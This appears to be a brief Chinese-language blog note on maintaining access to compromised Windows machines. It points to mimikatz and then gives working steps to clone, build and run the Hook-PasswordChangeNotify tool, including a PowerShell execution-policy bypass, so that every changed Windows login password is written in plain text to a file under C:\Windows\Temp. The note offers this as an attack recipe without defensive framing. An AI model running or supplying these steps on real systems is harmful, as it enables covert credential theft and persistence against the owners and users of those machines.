【笔记】Windows权限维持

发表于 更新于 阅读次数:

前言

Windows权限维持学习笔记

记录Windows登录密码

  • 通过mimikatz记录Windows登录密码

传送门

通过3gstudent/Hook-PasswordChangeNotify记录修改后的Windows登录密码

下载项目

1
2
git clone https://github.com/3gstudent/Hook-PasswordChangeNotify.git
cd Hook-PasswordChangeNotify

修改密码保存位置(可选)

  • 修改HookPasswordChange/HookPasswordChange.cpp文件第132行
1
outFile.open("c:\\windows\\temp\\passwords.txt", ios::app);

编译项目

1
msbuild HookPasswordChange\HookPasswordChange.sln -p:Configuration=Release

运行项目

1
powershell -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
  • 每当修改Windows登录密码时,会通过PowerShell脚本记录密码,保存到C:\Windows\Temp\password.txt文件中

完成